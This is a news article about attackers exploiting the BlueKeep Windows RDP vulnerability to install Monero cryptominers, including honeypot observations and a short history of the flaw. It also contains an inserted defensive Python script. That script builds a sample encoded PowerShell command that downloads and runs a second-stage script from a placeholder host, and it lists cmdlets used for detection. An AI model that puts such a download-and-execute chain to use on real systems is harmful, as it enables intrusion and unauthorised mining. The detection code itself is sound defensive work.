Tuesday, October 27, 17:54

Exploiting BlueKeep cryptomining vulnerability in Windows systems

The RDP vulnerability BlueKeep in Windows Remote Desktop Services is currently being exploited by hackers for cryptomining. The attackers compromise vulnerable systems and use them to mine cryptocurrency.

The attacks were observed through honeypots. The security researcher who discovered the attempts is Kevin Beaumont. He noticed that many honeypots in his EternalPot RDP honeypot network began to crash and restart. The honeypots had been active for about half a year, and Saturday was the first time such a malfunction was observed. Beaumont also noted that the machine in Australia did not crash.

MalwareTech (an online handle) examined the crashes reported by Beaumont and concluded that they were caused by exploitation of the BlueKeep vulnerability. MalwareTech said the attackers used BlueKeep to install a Monero miner.

MalwareTech's initial analysis showed that an initial payload runs an encoded PowerShell command, which downloads a second encoded PowerShell script. The final payload is a cryptominer (probably for Monero).
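A defender-side check for the two-stage chain described above, written here as an added example (it is not MalwareTech's analysis or code): it decodes the Base64/UTF-16LE `-EncodedCommand` argument from process-creation command lines and flags scripts that fetch a second stage. The sample command lines and the host name `example.invalid` are constructed for the example.

```python
import base64
import re

# Constructed stage-1 script: an encoded PowerShell one-liner that downloads
# and runs a second script, mirroring the chain described in the article.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
# PowerShell expects -EncodedCommand to be Base64 over UTF-16LE text.
STAGE1_B64 = base64.b64encode(STAGE1.encode("utf-16le")).decode("ascii")

# Constructed sample process-creation command lines (e.g. from Sysmon Event 1).
SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -W Hidden -Enc {STAGE1_B64}",
    "powershell.exe -Command Get-Service",
    "C:\\Windows\\System32\\notepad.exe",
]

# PowerShell accepts abbreviated forms of -EncodedCommand; match the common ones.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Cmdlets/aliases typically used to pull and execute a second stage.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "invoke-expression", "iex ")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_download_chain(cmdline):
    """True when an encoded command decodes to a script that fetches a second stage."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return False
    low = script.lower()
    return any(hint in low for hint in DOWNLOAD_HINTS)


def scan(cmdlines):
    """Return (cmdline, decoded_script) pairs for every flagged command line."""
    return [(c, decode_encoded_command(c)) for c in cmdlines if is_download_chain(c)]


if __name__ == "__main__":
    for cmdline, script in scan(SAMPLE_CMDLINES):
        print("FLAGGED:", cmdline[:60], "...\n  decodes to:", script)
```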

According to the researcher, the malware is not a worm, but it exploits the BlueKeep vulnerability en masse. The researcher concluded that the attackers were using more than one BlueKeep scanner, which helps them find vulnerable systems on which to install the cryptominer.

The researcher also said that the server used to exploit the vulnerability takes the target IP addresses from a predefined list.

A combination of cryptominer and BlueKeep scanner had also been reported in July. The malware that combined these two features was named Watchbog, and it mainly targeted Linux servers.

Intezer, which had studied the malware at the time, found that the scanner integration "indicates that WatchBog is preparing a list of vulnerable systems that hackers will target in the future or sell to others."

However, according to MalwareTech, the current attacks are not related to the Watchbog malware.

BlueKeep: a brief history of the vulnerability

The BlueKeep vulnerability (CVE-2019-0708) first appeared many months ago. Security experts rated it as critical, because it allows malware to spread to vulnerable systems without any user interaction. Many governments and security companies warned of the severity of the vulnerability, and Microsoft released a patch on 14 May.

Typically, exploiting this RDP vulnerability crashes the target system. The researchers who created a working exploit tried to keep the details secret, so that hackers could not immediately build their own version and attack unpatched systems.

Which versions of Windows are affected?

Fortunately, the BlueKeep vulnerability does not affect all versions of Windows. According to Microsoft, attackers can compromise Windows 7, Windows Server 2008 R2 and Windows Server 2008 and install the cryptominer on them.


Author: Absent Mia, https://www.secnews.gr